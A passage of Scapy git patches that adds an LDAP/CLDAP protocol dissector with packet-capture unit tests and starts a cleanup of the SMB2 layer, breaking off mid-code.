ASN1F_LDAP_Authentication_krbv42LDAP, + ASN1F_LDAP_Authentication_krbv42DSA, + ASN1F_PACKET( + "sasl", + LDAP_SaslCredentials(), + LDAP_SaslCredentials, + implicit_tag=0xa3), + ) + ) + + +class LDAP_BindResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *(LDAPResult.seq + ( + ASN1F_optional( + ASN1F_STRING("serverSaslCreds", "", + implicit_tag=0x87) + ),))) + +# Unbind operation +# https://datatracker.ietf.org/doc/html/rfc1777#section-4.2 + + +class LDAP_UnbindRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_NULL("info", 0) + + +# Search operation +# https://datatracker.ietf.org/doc/html/rfc1777#section-4.3 + + +class LDAP_SubstringFilterInitial(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPString("initial", "") + + +class LDAP_SubstringFilterAny(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPString("any", "") + + +class LDAP_SubstringFilterFinal(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPString("final", "") + + +class LDAP_SubstringFilterStr(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "str", ASN1_STRING(""), + ASN1F_PACKET("initial", + LDAP_SubstringFilterInitial(), + LDAP_SubstringFilterInitial, + implicit_tag=0x0), + ASN1F_PACKET("any", + LDAP_SubstringFilterAny(), + LDAP_SubstringFilterAny, + implicit_tag=0x1), + ASN1F_PACKET("final", + LDAP_SubstringFilterFinal(), + LDAP_SubstringFilterFinal, + implicit_tag=0x2), + ) + + +class LDAP_SubstringFilter(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + AttributeType("type", ""), + ASN1F_SEQUENCE_OF("filters", [], LDAP_SubstringFilterStr) + ) + + +_LDAP_Filter = lambda *args, **kwargs: LDAP_Filter(*args, **kwargs) + + +class LDAP_FilterAnd(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SET_OF("and", [], _LDAP_Filter) + + +class LDAP_FilterOr(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SET_OF("or", [], _LDAP_Filter) + + +class LDAP_FilterPresent(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeType("present", "") + + +class LDAP_Filter(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_CHOICE( + "filter", LDAP_FilterPresent(), + ASN1F_PACKET("and", None, LDAP_FilterAnd, + implicit_tag=0x80), + ASN1F_PACKET("or", None, LDAP_FilterOr, + implicit_tag=0x81), + ASN1F_PACKET("not", None, + _LDAP_Filter, + implicit_tag=0x82), + ASN1F_PACKET("equalityMatch", + AttributeValueAssertion(), + AttributeValueAssertion, + implicit_tag=0x83), + ASN1F_PACKET("substrings", + LDAP_SubstringFilter(), + LDAP_SubstringFilter, + implicit_tag=0x84), + ASN1F_PACKET("greaterOrEqual", + AttributeValueAssertion(), + AttributeValueAssertion, + implicit_tag=0x85), + ASN1F_PACKET("lessOrEqual", + AttributeValueAssertion(), + AttributeValueAssertion, + implicit_tag=0x86), + ASN1F_PACKET("present", LDAP_FilterPresent(), + LDAP_FilterPresent, + implicit_tag=0x87), + ASN1F_PACKET("approxMatch", None, AttributeValueAssertion, + implicit_tag=0x88), + ) + + +class LDAP_SearchRequestAttribute(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeType("type", "") + + +class LDAP_SearchRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPDN("baseObject", ""), + ASN1F_ENUMERATED("scope", 0, {0: "baseObject", + 1: "singleLevel", + 2: "wholeSubtree"}), + ASN1F_ENUMERATED("derefAliases", 0, {0: "neverDerefAliases", + 1: "derefInSearching", + 2: "derefFindingBaseObj", + 3: "derefAlways"}), + ASN1F_INTEGER("sizeLimit", 0), + ASN1F_INTEGER("timeLimit", 0), + ASN1F_BOOLEAN("attrsOnly", False), + ASN1F_PACKET("filter", LDAP_Filter(), + LDAP_Filter), + ASN1F_SEQUENCE_OF("attributes", [], + LDAP_SearchRequestAttribute) + ) + + +class LDAP_SearchResponseEntryAttributeValue(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValue("value", "") + + +class LDAP_SearchResponseEntryAttribute(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + AttributeType("type", ""), + ASN1F_SET_OF("values", [], + LDAP_SearchResponseEntryAttributeValue) + ) + + +class LDAP_SearchResponseEntry(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPDN("objectName", ""), + ASN1F_SEQUENCE_OF("attributes", + LDAP_SearchResponseEntryAttribute(), + LDAP_SearchResponseEntryAttribute) + ) + + +class LDAP_SearchResponseResultCode(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = LDAPResult + + +class LDAP_AbandonRequest(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_INTEGER("messageID", 0) + + +# LDAP v3 + + +class LDAP_Control(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAPOID("controlType", ""), + ASN1F_optional( + ASN1F_BOOLEAN("criticality", False), + ), + ASN1F_optional( + ASN1F_STRING("controlValue", "") + ), + ) + + +# LDAP + + +class LDAP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + ASN1F_INTEGER("messageID", 0), + ASN1F_CHOICE("protocolOp", LDAP_SearchRequest(), + ASN1F_PACKET("bindRequest", + LDAP_BindRequest(), + LDAP_BindRequest, + implicit_tag=0x60), + ASN1F_PACKET("bindResponse", + LDAP_BindResponse(), + LDAP_BindResponse, + implicit_tag=0x61), + ASN1F_PACKET("unbindRequest", + LDAP_UnbindRequest(), + LDAP_UnbindRequest, + implicit_tag=0x42), + ASN1F_PACKET("searchRequest", + LDAP_SearchRequest(), + LDAP_SearchRequest, + implicit_tag=0x63), + ASN1F_PACKET("searchResponse", + LDAP_SearchResponseEntry(), + LDAP_SearchResponseEntry, + implicit_tag=0x64), + ASN1F_PACKET("searchResponse", + LDAP_SearchResponseResultCode(), + LDAP_SearchResponseResultCode, + implicit_tag=0x65), + ASN1F_PACKET("abandonRequest", + LDAP_AbandonRequest(), + LDAP_AbandonRequest, + implicit_tag=0x70) + ), + # LDAP v3 only + ASN1F_optional( + ASN1F_SEQUENCE_OF("Controls", [], LDAP_Control, + implicit_tag=0x0) + ) + ) + + def mysummary(self): + return (self.protocolOp.__class__.__name__.replace("_", " "), [LDAP]) + + +bind_layers(LDAP, LDAP) + +bind_bottom_up(TCP, LDAP, dport=389) +bind_bottom_up(TCP, LDAP, sport=389) +bind_layers(TCP, LDAP, sport=389, dport=389) + +# CLDAP - rfc1798 + + +class CLDAP(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + LDAP.ASN1_root.seq[0], # messageID + ASN1F_optional( + LDAPDN("user", ""), + ), + LDAP.ASN1_root.seq[1] # protocolOp + ) + + +bind_layers(CLDAP, CLDAP) + +bind_bottom_up(UDP, CLDAP, dport=389) +bind_bottom_up(UDP, CLDAP, sport=389) +bind_layers(UDP, CLDAP, sport=389, dport=389) diff --git a/test/scapy/layers/ldap.uts b/test/scapy/layers/ldap.uts new file mode 100644 index 00000000000..515a2647f59 --- /dev/null +++ b/test/scapy/layers/ldap.uts @@ -0,0 +1,117 @@ +% LDAP TESTS + ++ Basic LDAP tests + += Load LDAP + +from scapy.layers.ldap import * + += LDAP_UnbindRequest + +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x003\xb2\x8a@\x00\x80\x06\xd2F\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfb\x01\x85\xa6\x89q"\xa1\x076\xdeP\x18\x03\xffG\xf0\x00\x000\x05\x02\x01\x07B\x00') +assert isinstance(pkt[LDAP].protocolOp, LDAP_UnbindRequest) + +pkt2 = Ether(raw(pkt)) +pkt2.clear_cache() +assert raw(pkt2) == pkt.original + += LDAP_BindRequest + +from scapy.layers.ntlm import * + +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00x\xb2\x94@\x00\x80\x06\xd1\xf7\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x85\xc3U/c\x9fP\x18 \x12U\x96\x00\x000B\x02\x01\x0c`=\x02\x01\x03\x04\x00\xa36\x04\nGSS-SPNEGO\x04(NTLMSSP\x00\x01\x00\x00\x00\xb7\x82\x08\xe2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00aJ\x00\x00\x00\x0f') +assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) +assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) +ntlm = NTLM_Header(pkt[LDAP].protocolOp.authentication.credentials.val) +assert isinstance(ntlm, NTLM_NEGOTIATE) + +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x01\xce\xb2\x95@\x00\x80\x06\xd0\xa0\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x86\x13U/d9P\x18 \x11\x11\x93\x00\x000\x82\x01\x9c\x02\x01\r`\x82\x01\x95\x02\x01\x03\x04\x00\xa3\x82\x01\x8c\x04\nGSS-SPNEGO\x04\x82\x01|NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00h\x00\x00\x00\xec\x00\xec\x00\x80\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x08\x00\x08\x00X\x00\x00\x00\x08\x00\x08\x00`\x00\x00\x00\x10\x00\x10\x00l\x01\x00\x005\x82\x88\xe2\n\x00aJ\x00\x00\x00\x0f\xa0\xcd\xd2\xaa\xfdQc\xacs\\\xf6\xa3\x07\n\x05$t\x00o\x00t\x00o\x00W\x00I\x00N\x002\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf1\xd1\x8e\xd6w\x99\t\rdQ\x05\xa6iI\xd1\x19\x01\x01\x00\x00\x00\x00\x00\x00\xb8}\x868\xe1\xc5\xd7\x01?\x84\xe3V\xcf&/\xf0\x00\x00\x00\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xb8}\x868\xe1\xc5\xd7\x01\x06\x00\x04\x00\x02\x00\x00\x00\x08\x000\x000\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00 \x00\x00\x0b\xd3s!~\x13\x9a\xcc\xc77\xf4\xcc\x90b\xcc|\x8f\xd2\xe8\xb85cw\x89#\x0e\x8bd\xfcPYf\n\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00(\x00l\x00d\x00a\x00p\x00/\x001\x009\x002\x00.\x001\x006\x008\x00.\x001\x002\x002\x00.\x001\x005\x006\x00\x00\x00\x00\x00\x00\x00\x00\x00rD\x8c\x9d\x1b\xa6\xa9\x1a7\xd3\x96\x0f\xbe\xab\xecC') +assert isinstance(pkt[LDAP].protocolOp, LDAP_BindRequest) +assert isinstance(pkt[LDAP].protocolOp.authentication, LDAP_SaslCredentials) +ntlm = NTLM_Header(pkt[LDAP].protocolOp.authentication.credentials.val) +assert isinstance(ntlm, NTLM_AUTHENTICATE_V2) +assert ntlm.Payload[1] == ('UserName', 'toto') +assert ntlm.Payload[2] == ('Workstation', 'WIN2') +assert isinstance(ntlm.Payload[4][1], NTLMv2_RESPONSE) +assert ntlm.Payload[4][1].AvPairs[8].Value == 'ldap/192.168.122.156' + += LDAP_BindResponse + +pkt = Ether(b'RT\x00\x0cG\xabRT\x00!l+\x08\x00E\x00\x00\xc2\x18\xec@\x00\x80\x06kV\xc0\xa8z\x9c\xc0\xa8z\x06\x01\x85\xc2\xfcU/c\x9f\x1d\x92\x86\x13P\x18 \x12\x00\xd1\x00\x000\x81\x90\x02\x01\x0ca\x81\x8a\n\x01\x0e\x04\x00\x04\x00\x87\x81\x80NTLMSSP\x00\x02\x00\x00\x00\x08\x00\x08\x008\x00\x00\x005\x82\x8a\xe2Kn3@\x98\xb7\xc11\x00\x00\x00\x00\x00\x00\x00\x00@\x00@\x00@\x00\x00\x00\n\x00aJ\x00\x00\x00\x0fW\x00I\x00N\x001\x00\x02\x00\x08\x00W\x00I\x00N\x001\x00\x01\x00\x08\x00W\x00I\x00N\x001\x00\x04\x00\x08\x00W\x00I\x00N\x001\x00\x03\x00\x08\x00W\x00I\x00N\x001\x00\x07\x00\x08\x00\xb8}\x868\xe1\xc5\xd7\x01\x00\x00\x00\x00') +assert isinstance(pkt[LDAP].protocolOp, LDAP_BindResponse) +ntlm = NTLM_Header(pkt[LDAP].protocolOp.serverSaslCreds.val) +assert isinstance(ntlm, NTLM_CHALLENGE) +assert ntlm.Payload[0] == ('TargetName', 'WIN1') +assert ntlm.Payload[1][1][0].Value == "WIN1" + +pkt = Ether(b'RT\x00\x0cG\xabRT\x00!l+\x08\x00E\x00\x00\x96\x18\xed@\x00\x80\x06k\x81\xc0\xa8z\x9c\xc0\xa8z\x06\x01\x85\xc2\xfcU/d9\x1d\x92\x87\xb9P\x18 \x11\x01\xdc\x00\x000d\x02\x01\ra_\n\x011\x04\x00\x04X8009030C: LdapErr: DSID-0C09058A, comment: AcceptSecurityContext error, data 52e, v4a63\x00') +assert isinstance(pkt[LDAP].protocolOp, LDAP_BindResponse) +assert pkt[LDAP].protocolOp.diagnosticMessage.val == b'8009030C: LdapErr: DSID-0C09058A, comment: AcceptSecurityContext error, data 52e, v4a63\x00' + += LDAP_SearchRequest + +pkt = Ether(b'RT\x00!l+RT\x00\x0cG\xab\x08\x00E\x00\x00[\xb2\x8e@\x00\x80\x06\xd2\x1a\xc0\xa8z\x06\xc0\xa8z\x9c\xc2\xfc\x01\x85\x1d\x92\x84VU/V:P\x18 \x14Q<\x00\x000%\x02\x01\x08c \x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01d\x01\x01\x00\x87\x0bobjectClass0\x00') +assert isinstance(pkt[LDAP].protocolOp, LDAP_SearchRequest) +assert pkt[LDAP].protocolOp.baseObject == b"" +assert pkt[LDAP].protocolOp.timeLimit == 0x64 +assert pkt[LDAP].protocolOp.filter.filter.present == b"objectClass" + +pkt2 = Ether(raw(pkt)) +pkt2.clear_cache() +assert raw(pkt2) == pkt.original + += LDAP_SearchResponse + +pkt = LDAP(b'0\x82\nr\x02\x01\x08d\x82\nk\x04\x000\x82\ne0\x1a\x04\x13forestFunctionality1\x03\x04\x0120$\x04\x1ddomainControllerFunctionality1\x03\x04\x0170E\x04\x17supportedSASLMechanisms1*\x04\x06GSSAPI\x04\nGSS-SPNEGO\x04\x08EXTERNAL\x04\nDIGEST-MD50\x1e\x04\x14supportedLDAPVersion1\x06\x04\x013\x04\x0120\x82\x01\x98\x04\x15supportedLDAPPolicies1\x82\x01}\x04\x0eMaxPoolThreads\x04\x19MaxPercentDirSyncRequests\x04\x0fMaxDatagramRecv\x04\x10MaxReceiveBuffer\x04\x0fInitRecvTimeout\x04\x0eMaxConnections\x04\x0fMaxConnIdleTime\x04\x0bMaxPageSize\x04\x16MaxBatchReturnMessages\x04\x10MaxQueryDuration\x04\x12MaxDirSyncDuration\x04\x10MaxTempTableSize\x04\x10MaxResultSetSize\x04\rMinResultSets\x04\x14MaxResultSetsPerConn\x04\x16MaxNotificationPerConn\x04\x0bMaxValRange\x04\x15MaxValRangeTransitive\x04\x11ThreadMemoryLimit\x04\x18SystemMemoryLimitPercent0\x82\x03\xf2\x04\x10supportedControl1\x82\x03\xdc\x04\x161.2.840.113556.1.4.319\x04\x161.2.840.113556.1.4.801\x04\x161.2.840.113556.1.4.473\x04\x161.2.840.113556.1.4.528\x04\x161.2.840.113556.1.4.417\x04\x161.2.840.113556.1.4.619\x04\x161.2.840.113556.1.4.841\x04\x161.2.840.113556.1.4.529\x04\x161.2.840.113556.1.4.805\x04\x161.2.840.113556.1.4.521\x04\x161.2.840.113556.1.4.970\x04\x171.2.840.113556.1.4.1338\x04\x161.2.840.113556.1.4.474\x04\x171.2.840.113556.1.4.1339\x04\x171.2.840.113556.1.4.1340\x04\x171.2.840.113556.1.4.1413\x04\x172.16.840.1.113730.3.4.9\x04\x182.16.840.1.113730.3.4.10\x04\x171.2.840.113556.1.4.1504\x04\x171.2.840.113556.1.4.1852\x04\x161.2.840.113556.1.4.802\x04\x171.2.840.113556.1.4.1907\x04\x171.2.840.113556.1.4.1948\x04\x171.2.840.113556.1.4.1974\x04\x171.2.840.113556.1.4.1341\x04\x171.2.840.113556.1.4.2026\x04\x171.2.840.113556.1.4.2064\x04\x171.2.840.113556.1.4.2065\x04\x171.2.840.113556.1.4.2066\x04\x171.2.840.113556.1.4.2090\x04\x171.2.840.113556.1.4.2205\x04\x171.2.840.113556.1.4.2204\x04\x171.2.840.113556.1.4.2206\x04\x171.2.840.113556.1.4.2211\x04\x171.2.840.113556.1.4.2239\x04\x171.2.840.113556.1.4.2255\x04\x171.2.840.113556.1.4.2256\x04\x171.2.840.113556.1.4.2309\x04\x171.2.840.113556.1.4.2330\x04\x171.2.840.113556.1.4.23540\x81\xc9\x04\x15supportedCapabilities1\x81\xaf\x04\x171.2.840.113556.1.4.1851\x04\x171.2.840.113556.1.4.1670\x04\x171.2.840.113556.1.4.1791\x04\x171.2.840.113556.1.4.1935\x04\x171.2.840.113556.1.4.2080\x04\x171.2.840.113556.1.4.2237\x04\x171.2.840.113556.1.4.18800h\x04\x11subschemaSubentry1S\x04QCN=Aggregate,CN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x81\x88\x04\nserverName1z\x04xCN=WIN1$ADWIN1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0]\x04\x13schemaNamingContext1F\x04DCN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x81\x95\x04\x0enamingContexts1\x81\x82\x04:CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}\x04DCN=Schema,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x18\x04\x0eisSynchronized1\x06\x04\x04TRUE0\x1e\x04\x13highestCommittedUSN1\x07\x04\x05123490\x81\x9e\x04\rdsServiceName1\x81\x8c\x04\x81\x89CN=NTDS Settings,CN=WIN1$ADWIN1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x15\x04\x0bdnsHostName1\x06\x04\x04WIN10"\x04\x0bcurrentTime1\x13\x04\x1120211020183502.0Z0Z\x04\x1aconfigurationNamingContext1<\x04:CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}0\x0c\x02\x01\x08e\x07\n\x01\x00\x04\x00\x04\x00') +assert pkt.getlayer(LDAP, 2) +assert isinstance(pkt.protocolOp, LDAP_SearchResponseEntry) +assert isinstance(pkt.getlayer(LDAP, 2).protocolOp, LDAP_SearchResponseResultCode) + +assert len(pkt.protocolOp.attributes) == 17 +assert [x.type.val for x in pkt.protocolOp.attributes] == [ + b'forestFunctionality', + b'domainControllerFunctionality', + b'supportedSASLMechanisms', + b'supportedLDAPVersion', + b'supportedLDAPPolicies', + b'supportedControl', + b'supportedCapabilities', + b'subschemaSubentry', + b'serverName', + b'schemaNamingContext', + b'namingContexts', + b'isSynchronized', + b'highestCommittedUSN', + b'dsServiceName', + b'dnsHostName', + b'currentTime', + b'configurationNamingContext' +] +assert pkt.protocolOp.attributes[13].values[0].value == b'CN=NTDS Settings,CN=WIN1$ADWIN1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,CN={7FA71C80-F7BA-4B58-9219-6C6B09E8D0A1}' + +assert pkt.getlayer(LDAP, 2).protocolOp.resultCode == 0 + +pkt2 = Ether(raw(pkt)) +pkt2.clear_cache() +assert raw(pkt2) == pkt.original + ++ CLDAP tests + += Basic CLDAP dissection & build test + +pkt = Ether(b'RT\x00\xbc\xe0=RT\x00y\xb1F\x08\x00E\x00\x00\xa5\x01\x1a\x00\x00\x80\x11\xc3H\xc0\xa8z\x91\xc0\xa8z\x03\xf1!\x01\x85\x00\x91o&0\x84\x00\x00\x00\x83\x02\x01\x01c\x84\x00\x00\x00z\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\xa0\x84\x00\x00\x00S\xa3\x84\x00\x00\x00"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\xa3\x84\x00\x00\x00\x12\x04\x04Host\x04\nWINDOWS7-3\xa3\x84\x00\x00\x00\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\x84\x00\x00\x00\n\x04\x08Netlogon') +assert pkt.protocolOp.filter.filter.getfieldval("and")[2].filter.attributeType == b"NtVer" +assert pkt.protocolOp.attributes[0].type == b"Netlogon" + +raw(pkt[CLDAP]) == b'0k\x02\x01\x01cf\x04\x00\n\x01\x00\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x80G\x88"\x04\tDnsDomain\x04\x15s4.howto.abartlet.net\x88\x12\x04\x04Host\x04\nWINDOWS7-3\x88\r\x04\x05NtVer\x04\x04\x16\x00\x00\x000\n\x04\x08Netlogon' + += More advanced CLDAP dissection & build test + +pkt = Ether(b'RT\x00y\xb1FRT\x00\xbc\xe0=\x08\x00E\x00\x00\xb3\x00\x00@\x00@\x11\xc4T\xc0\xa8z\x03\xc0\xa8z\x91\x01\x85\xf1!\x00\x9fv\x960\x81\x86\x02\x01\x01d\x81\x80\x04\x000|0z\x04\x08netlogon1n\x04l\x17\x00\x00\x00\xbd\x11\x00\x00t\x97x\x1f\x05;\xd7B\x8b\xb2\x8c\xf3\xd9z\x7fj\x02s4\x05howto\x08abartlet\x03net\x00\xc0\x18\x04obed\xc0\x18\x08S4-HOWTO\x00\x04OBED\x00\x00\x17Default-First-Site-Name\x00\xc0I\x05\x00\x00\x00\xff\xff\xff\xff0\x0c\x02\x01\x01e\x07\n\x01\x00\x04\x00\x04\x00') +assert pkt.getlayer(CLDAP, 2) +assert isinstance(pkt.protocolOp[0].attributes[0].values[0], LDAP_SearchResponseEntryAttributeValue) +assert pkt.getlayer(CLDAP, 2).protocolOp.resultCode == 0x0 + +pkt2 = Ether(raw(pkt)) +pkt2.clear_cache() +assert raw(pkt2) == pkt.original From c8df1ace27d4b1085b324b4660e2acea82d0a6c6 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 30 Nov 2021 17:51:19 +0100 Subject: [PATCH 0704/1632] Cleanup SMB2 --- scapy/fields.py | 10 +- scapy/layers/ntlm.py | 9 +- scapy/layers/smb2.py | 360 +++++++++++++++++++++++++++---------- test/fields.uts | 11 +- test/scapy/layers/smb.uts | 14 +- test/scapy/layers/smb2.uts | 199 ++++++++++---------- 6 files changed, 397 insertions(+), 206 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index e5bee79d165..9bcf94393db 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2871,14 +2871,14 @@ class FlagsField(_BitField[Optional[Union[int, FlagValue]]]): >>> class FlagsTest2(Packet): fields_desc = [ FlagsField("flags", 0x2, 16, { - 1: "1", # 1st bit - 8: "2" # 8th bit + 0x0001: "A", + 0x0008: "B", }) ] :param name: field's name :param default: default value for the field - :param size: number of bits in the field (in bits) + :param size: number of bits in the field (in bits). if negative, LE :param names: (list or str or dict) label for each flag If it's a str or a list, the least Significant Bit tag's name is written first. @@ -2895,9 +2895,9 @@ def __init__(self, # type: (...) -> None # Convert the dict to a list if isinstance(names, dict): - tmp = ["bit_%d" % i for i in range(size)] + tmp = ["bit_%d" % i for i in range(abs(size))] for i, v in six.viewitems(names): - tmp[i] = v + tmp[int(math.floor(math.log(i, 2)))] = v names = tmp # Store the names as str or list self.names = names diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index ccf5b0be26c..4d33cf8585b 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -78,8 +78,9 @@ def m2i(self, pkt, x): offset = pkt.getfieldval(field.name + "BufferOffset") - self.offset if offset < 0: continue - results.append((offset, field.name, field.getfield( - pkt, x[offset:offset + length])[1])) + if x[offset:offset + length]: + results.append((offset, field.name, field.getfield( + pkt, x[offset:offset + length])[1])) results.sort(key=lambda x: x[0]) return [x[1:] for x in results] @@ -90,8 +91,8 @@ def i2m(self, pkt, x): if field_name not in self.fields_map: continue field = self.fields_map[field_name] - offset = pkt.getfieldval( - field_name + "BufferOffset") or len(buf) + offset = (-self.offset + pkt.getfieldval( + field_name + "BufferOffset")) or len(buf) buf.append(field.addfield(pkt, b"", value), offset + 1) return bytes(buf) diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index fa959b0100b..d084e6fb634 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -7,6 +7,8 @@ SMB (Server Message Block), also known as CIFS - version 2 """ +import struct + from scapy.config import conf from scapy.packet import Packet, bind_layers, bind_top_down from scapy.fields import ( @@ -21,47 +23,75 @@ LEShortEnumField, LEShortField, PacketField, + PacketLenField, ReversePadField, ShortEnumField, ShortField, StrFieldUtf16, StrFixedLenField, + UTCTimeField, UUIDField, XLEIntField, - XLELongField, XLEShortField, - XLongField, XNBytesField, XStrLenField, ) +from scapy.layers.gssapi import GSSAPI_BLOB +from scapy.layers.ntlm import _NTLMPayloadField + # EnumField SMB_DIALECTS = { 0x0202: 'SMB 2.0.2', 0x0210: 'SMB 2.1', + 0x02ff: 'SMB 2.?', 0x0300: 'SMB 3.0', 0x0302: 'SMB 3.0.2', 0x0311: 'SMB 3.1.1', } +# SMB2 sect 2.2.1.1 +SMB2_COM = { + 0x0000: "SMB2_NEGOTIATE", + 0x0001: "SMB2_SESSION_SETUP", + 0x0002: "SMB2_LOGOFF", + 0x0003: "SMB2_TREE_CONNECT", + 0x0004: "SMB2_TREE_DISCONNECT", + 0x0005: "SMB2_CREATE", + 0x0006: "SMB2_CLOSE", + 0x0007: "SMB2_FLUSH", + 0x0008: "SMB2_READ", + 0x0009: "SMB2_WRITE", + 0x000A: "SMB2_LOCK", + 0x000B: "SMB2_IOCTL", + 0x000C: "SMB2_CANCEL", + 0x000D: "SMB2_ECHO", + 0x000E: "SMB2_QUERY_DIRECTORY", + 0x000F: "SMB2_CHANGE_NOTIFY", + 0x0010: "SMB2_QUERY_INFO", + 0x0011: "SMB2_SET_INFO", + 0x0012: "SMB2_OPLOCK_BREAK", +} + # EnumField -SMB2_NEGOCIATE_CONTEXT_TYPES = { +SMB2_NEGOTIATE_CONTEXT_TYPES = { 0x0001: 'SMB2_PREAUTH_INTEGRITY_CAPABILITIES', 0x0002: 'SMB2_ENCRYPTION_CAPABILITIES', 0x0003: 'SMB2_COMPRESSION_CAPABILITIES', - 0x0005: 'SMB2_NETNAME_NEGOCIATE_CONTEXT_ID', + 0x0005: 'SMB2_NETNAME_NEGOTIATE_CONTEXT_ID', } # FlagField SMB2_CAPABILITIES = { - 30: "Encryption", - 29: "DirectoryLeasing", - 28: "PersistentHandles", - 27: "MultiChannel", - 26: "LargeMTU", - 25: "Leasing", - 24: "DFS", + 0x00000001: "DFS", + 0x00000002: "Leasing", + 0x00000004: "LargeMTU", + 0x00000008: "MultiChannel", + 0x00000010: "PersistentHandles", + 0x00000020: "DirectoryLeasing", + 0x00000040: "Encryption", + } # EnumField @@ -74,33 +104,60 @@ } +def _SMB2_post_build(self, p, pay_offset, fields): + """Util function to build the offset and populate the lengths""" + for field_name, value in self.Buffer: + length = self.get_field( + "Buffer").fields_map[field_name].i2len(self, value) + offset = fields[field_name] + # Offset + if self.getfieldval(field_name + "BufferOffset") is None: + p = p[:offset] + \ + struct.pack(" bytes + return _SMB2_post_build(self, pkt, self.OFFSET, { + "Security": 12, + }) + pay + + bind_top_down( SMB2_Header, - SMB2_Negociate_Protocol_Response_Header, - Command=0x0000, - Flags=2 ** 24 # SMB2_FLAGS_SERVER_TO_REDIR + SMB2_Session_Setup_Request, + Command=0x0001, + Flags=1 # SMB2_FLAGS_SERVER_TO_REDIR ) -bind_layers( - SMB2_Negociate_Context, - SMB2_Preauth_Integrity_Capabilities, - ContextType=0x0001 -) -bind_layers( - SMB2_Negociate_Context, - SMB2_Encryption_Capabilities, - ContextType=0x0002 -) -bind_layers( - SMB2_Negociate_Context, - SMB2_Compression_Capabilities, - ContextType=0x0003 -) -bind_layers( - SMB2_Negociate_Context, - SMB2_Netname_Negociate_Context_ID, - ContextType=0x0005 + +# sect 2.2.6 + + +class SMB2_Session_Setup_Response(Packet): + name = "SMB2 Session Setup Response" + OFFSET = 8 + 64 + fields_desc = [ + XLEShortField("StructureSize", 0), + FlagsField("SessionFlags", 0, -16, { + 